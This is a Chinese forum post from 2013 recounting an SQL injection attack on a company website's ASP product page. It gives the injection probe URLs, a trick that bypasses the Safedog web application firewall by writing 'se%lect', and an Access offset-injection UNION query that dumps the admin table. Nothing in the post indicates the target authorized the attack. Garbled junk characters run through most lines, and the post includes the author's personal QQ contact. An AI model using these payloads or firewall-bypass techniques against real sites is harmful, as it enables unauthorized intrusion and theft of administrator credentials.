打开网站,一个企业站。+ X& j) ?1 _ B2 S) C, {8 D1 x6 O
/ Q, p" t, C: [0 f2 b
; Y8 u8 m1 O# v: C; f7 Y' Z) U顺手加个admin
% T+ ^& [4 D* D' d/ \5 ^; }$ C
/ N( T/ Z0 P! S& f* T7 {2 v$ X# S! f u: g) |. g- D
默认后台。
9 _& E0 ~& B6 W9 D回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
0 P* n7 J2 W% O' z1 n+ i0 h0 h' ^1 Q. c( G
u3 D) O6 w6 y. e& M# ] a
# c( f& A0 Q: w+ K$ n. w
所以就不用御剑扫了,待会直接封IP。8 A6 h( k& W* m2 ~
2 E. f. `1 w5 U U% c用order by语句判断是否存在注入。! L% U/ u6 p9 M
http://www.xxx.com /product_show.asp?id=997 order by 1, e- p) u+ I. q4 `8 Q) c+ r
http://www.xxx.com /product_show.asp?id=997 order by 100
! v- N0 ]' S) k4 a% K现在存在注入,经测试后发现是9个字段。% o5 D/ L0 r% M9 n. i# G+ Q8 ~
5 }& O2 C- G+ N* ]/ L4 S+ z接下来进行联合查询,猜是否存在admin表。8 Y% D6 w$ S) B) H
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。- }7 r% t' Z7 }' [! _
1 N' b$ S- t, ^2 p% @0 G: |
1 F+ M1 {% G) E) q2 A/ r( X, v2 k
6 m2 m/ \: W( U在select中间加个%,se%lect绕过安全狗。/ C& O* k g( ]7 t" ?. ]& p: m
$ q% C4 p1 Q- j( m1 U4 d$ o+ @# ^
& C1 ~1 L; m" w" X, M" H发现存在admin表,然后开始手工猜常用的字段。
' Q* k/ _; |3 \3 R. J4 r! i+ b4 H纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
" W' _7 m2 l3 i! r& `
5 N0 f) z& i+ v( } r突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
$ |7 d' I7 n( t& m0 q
5 @2 V7 p$ `4 Y( V' b. ], S! R6 F8 y科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。$ \1 @3 k3 K) |
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
, u; j5 z& i5 t$ N3 R. Q) Y. m, P# K3 O好了,敏感内容出显了。
* {# s0 R; a, `: T: H* ~5 y O
7 O* K& g) [" Q- p5 Y: w. z. _6 B+ s* K$ H3 p" | n
% {. _: P% `7 [
|
发表于 2013-3-8 21:49:45
收藏
支持
反对